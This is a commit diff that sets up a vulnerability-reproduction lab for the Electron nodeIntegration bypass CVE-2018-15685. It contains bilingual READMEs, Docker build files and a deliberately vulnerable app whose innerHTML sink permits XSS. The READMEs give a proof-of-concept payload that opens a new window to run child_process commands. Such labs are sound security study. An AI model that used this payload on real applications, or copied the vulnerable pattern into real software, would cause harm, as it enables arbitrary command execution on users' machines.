first commit

electron/CVE-2018-15685/README.md

@@ -0,0 +1,50 @@
+# Electron WebPreferences Remote Code Execution Vulnerability（CVE-2018-15685）
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Electron is an open source library developed by GitHub for building cross-platform desktop applications with HTML, CSS, and JavaScript. Electron accomplishes this by combining Chromium and Node.js into a single runtime and apps can be packaged for Mac, Windows, and Linux.
+
+When Electron sets `nodeIntegration=false` (default), the JavaScript in the page cannot access the built-in library of node.js. CVE-2018-15685 bypass this limitation, enabling arbitrary commands to be executed if the user can execute JavaScript (such as when accessing a third-party page or an XSS vulnerability exists in the app).
+
+Reference links:
+
+- https://electronjs.org/blog/web-preferences-fix
+- https://www.contrastsecurity.com/security-influencers/cve-2018-15685
+
+## Compile application
+
+Execute the following command to compile an  vulnerability application:
+
+```
+docker compose run -e PLATFORM=win64 --rm electron
+```
+
+The value of `PLATFORM` is the operating system on which the application is running. The options are:`win64`、`win32`、`mac`、`linux`。
+
+After the compilation completed, execute the following command to run the web service:
+
+```
+docker compose run --rm -p 8080:80 web
+```
+
+Now，access`http://your-ip:8080/cve-2018-15685.tar.gz`to download application.
+
+## expliot
+
+Open the app:
+
+![](1.png)
+
+Click submit, the content in the input box will be displayed in the app, and there is obviously an XSS vulnerability.
+
+We submit `<img src=1 onerror="require('child_process').exec('calc.exe')">` and find that nothing happens, because `nodeIntegration=false`.
+
+At this time, submit the POC (Windows):
+
+```
+<img src=1 onerror="window.open().open('data:text/html,<script>require(\'child_process\').exec(\'calc.exe\')</script>');">
+```
+
+As you see, calc.exe shows up.
+
+![](2.png)

electron/CVE-2018-15685/README.zh-cn.md

@@ -0,0 +1,48 @@
+# Electron WebPreferences 远程命令执行漏洞（CVE-2018-15685）
+
+Electron是由Github开发，用HTML，CSS和JavaScript来构建跨平台桌面应用程序的一个开源库。 Electron通过将Chromium和Node.js合并到同一个运行时环境中，并将其打包为Mac，Windows和Linux系统下的应用来实现这一目的。
+
+Electron在设置了`nodeIntegration=false`的情况下（默认），页面中的JavaScript无法访问node.js的内置库。CVE-2018-15685绕过了该限制，导致在用户可执行JavaScript的情况下（如访问第三方页面或APP存在XSS漏洞时），能够执行任意命令。
+
+参考链接：
+
+- https://electronjs.org/blog/web-preferences-fix
+- https://www.contrastsecurity.com/security-influencers/cve-2018-15685
+
+## 编译APP
+
+执行如下命令编译一个包含漏洞的应用：
+
+```
+docker compose run -e PLATFORM=win64 --rm electron
+```
+
+其中PLATFORM的值是运行该应用的操作系统，可选项有：`win64`、`win32`、`mac`、`linux`。
+
+编译完成后，再执行如下命令，启动web服务：
+
+```
+docker compose run --rm -p 8080:80 web
+```
+
+此时，访问`http://your-ip:8080/cve-2018-15685.tar.gz`即可下载编译好的应用。
+
+## 复现漏洞
+
+在本地打开应用：
+
+![](1.png)
+
+点击提交，输入框中的内容将会显示在应用中，显然这里存在一处XSS漏洞。
+
+我们提交`<img src=1 onerror="require('child_process').exec('calc.exe')">`，发现没有任何反馈，原因就是`nodeIntegration=false`。
+
+此时，提交POC（Windows）：
+
+```
+<img src=1 onerror="window.open().open('data:text/html,<script>require(\'child_process\').exec(\'calc.exe\')</script>');">
+```
+
+可见，calc.exe已成功弹出：
+
+![](2.png)

electron/CVE-2018-15685/build/.gitignore

@@ -0,0 +1 @@
+*.tar.gz

electron/CVE-2018-15685/docker-compose.yml

@@ -0,0 +1,15 @@
+version: '2'
+services:
+ electron:
+   image: vulhub/electron:wine
+   command: bash /docker-entrypoint.sh
+   volumes:
+    - ./src:/project
+    - ./build:/build
+    - ./docker-entrypoint.sh:/docker-entrypoint.sh
+ web:
+   image: nginx:1
+   volumes:
+    - ./build:/usr/share/nginx/html
+   ports:
+    - "8080:80"

electron/CVE-2018-15685/docker-entrypoint.sh

@@ -0,0 +1,8 @@
+#!/bin/bash
+
+set -ex 
+
+cd /project && npm install && npm run build-${PLATFORM:=win64}
+
+tar -zcvf /build/cve-2018-15685.tar.gz /build/cve-2018-15685-* --exclude /build/cve-2018-15685.tar.gz
+rm -rf /build/cve-2018-15685-*

electron/CVE-2018-15685/src/index.html

@@ -0,0 +1,21 @@
+<!DOCTYPE html>
+<html>
+  <head>
+    <meta charset="UTF-8">
+    <title>Hello World!</title>
+  </head>
+  <body>
+    <h1>Hello World!</h1>
+    <p>This window does not have access to node bindings.</p>
+    <pre>process: <script>document.write(process)</script></pre>
+
+    <p id="content">output...</p>
+    <p>
+      <label>input your script: </label>
+      <textarea rows="5" cols="20" id="script"></textarea>
+
+      <input type="button" onclick="document.getElementById('content').innerHTML = document.getElementById('script').value" value="Submit">
+    </p>
+    
+  </body>
+</html>

electron/CVE-2018-15685/src/main.js

@@ -0,0 +1,59 @@
+// Modules to control application life and create native browser window
+const {app, BrowserWindow} = require('electron')
+
+// Keep a global reference of the window object, if you don't, the window will
+// be closed automatically when the JavaScript object is garbage collected.
+let mainWindow
+
+function createWindow () {
+  // Create the browser window.
+  mainWindow = new BrowserWindow(
+    {
+      width: 800, 
+      height: 600,
+      "webPreferences": {
+        "nodeIntegration": false,
+        "nativeWindowOpen": true
+      }
+    }
+  );
+
+  // and load the index.html of the app.
+  mainWindow.loadFile('index.html');// this could be remote content
+
+  // Open the DevTools.
+  // mainWindow.webContents.openDevTools()
+
+  // Emitted when the window is closed.
+  mainWindow.on('closed', function () {
+    // Dereference the window object, usually you would store windows
+    // in an array if your app supports multi windows, this is the time
+    // when you should delete the corresponding element.
+    mainWindow = null
+  })
+}
+
+// This method will be called when Electron has finished
+// initialization and is ready to create browser windows.
+// Some APIs can only be used after this event occurs.
+app.on('ready', createWindow)
+
+// Quit when all windows are closed.
+app.on('window-all-closed', function () {
+  // On OS X it is common for applications and their menu bar
+  // to stay active until the user quits explicitly with Cmd + Q
+  if (process.platform !== 'darwin') {
+    app.quit()
+  }
+})
+
+app.on('activate', function () {
+  // On OS X it's common to re-create a window in the app when the
+  // dock icon is clicked and there are no other windows open.
+  if (mainWindow === null) {
+    createWindow()
+  }
+})
+
+// In this file you can include the rest of your app's specific main process
+// code. You can also put them in separate files and require them here.

electron/CVE-2018-15685/src/package.json

@@ -0,0 +1,14 @@
+{
+  "name": "cve-2018-15685",
+  "version": "0.0.1",
+  "main": "main.js",
+  "scripts": {
+    "build-win32": "electron-packager . cve-2018-15685 --platform=win32 --arch=ia32 --electronVersion=2.0.7 --appVersion=0.0.1 --out=/build --overwrite",
+    "build-win64": "electron-packager . cve-2018-15685 --platform=win32 --arch=x64 --electronVersion=2.0.7 --appVersion=0.0.1 --out=/build --overwrite",
+    "build-mac": "electron-packager . cve-2018-15685 --platform=darwin --arch=x64 --electronVersion=2.0.7 --appVersion=0.0.1 --out=/build --overwrite",
+    "build-linux": "electron-packager . cve-2018-15685 --platform=linux --arch=x64 --electronVersion=2.0.7 --appVersion=0.0.1 --out=/build --overwrite"
+  },
+  "devDependencies": {
+    "electron-packager": "^12.0.2"
+  }
+}